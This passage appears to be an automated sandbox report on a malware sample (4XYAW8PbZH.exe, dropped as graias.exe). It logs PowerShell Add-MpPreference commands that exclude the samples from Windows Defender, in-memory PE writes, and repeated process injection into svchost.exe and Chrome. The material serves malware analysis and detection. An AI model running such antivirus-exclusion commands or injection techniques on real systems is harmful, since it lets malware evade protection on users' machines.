                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe"
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Graias\graias.exe"
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Memory written: C:\Users\user\Desktop\4XYAW8PbZH.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory written: C:\Users\user\AppData\Roaming\Graias\graias.exe base: 400000 value starts with: 4D5A
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: NULL target: C:\Program Files\Google\Chrome\Application\chrome.exe protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Section loaded: NULL target: unknown protection: execute and read and write
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2CD7008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 3062008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 26B5008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2483008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 24E2008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2E34008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2E3D008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2754008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2C3F008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2365008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2E51008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 254A008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2A5D008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2AEF008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2B6B008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 23AD008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2B88008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2829008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2DB5008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 26EC008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 25F8008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2C65008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 23F4008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 25DB008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2CEA008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 275F008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2EBA008
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 27FB008
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe 3_2_00410F36
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exe | Code function: 3_2_00418764 mouse_event,3_2_00418764
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\4XYAW8PbZH.exe"Jump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess created: C:\Users\user\Desktop\4XYAW8PbZH.exe "C:\Users\user\Desktop\4XYAW8PbZH.exe"Jump to behavior
                Source: C:\Users\user\Desktop\4XYAW8PbZH.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe "C:\Users\user\AppData\Roaming\Graias\graias.exe" Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\Graias\graias.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Users\user\AppData\Roaming\Graias\graias.exe "C:\Users\user\AppData\Roaming\Graias\graias.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2016 --field-trial-handle=1976,i,9020892517801786784,10645353824597710220,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: C:\Windows\SysWOW64\svchost.exe svchost.exe
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: unknown unknown
                Source: C:\Users\user\AppData\Roaming\Graias\graias.exe | Process created: unknown unknown
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
                Source: C:\Windows\SysWOW64\svchost.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
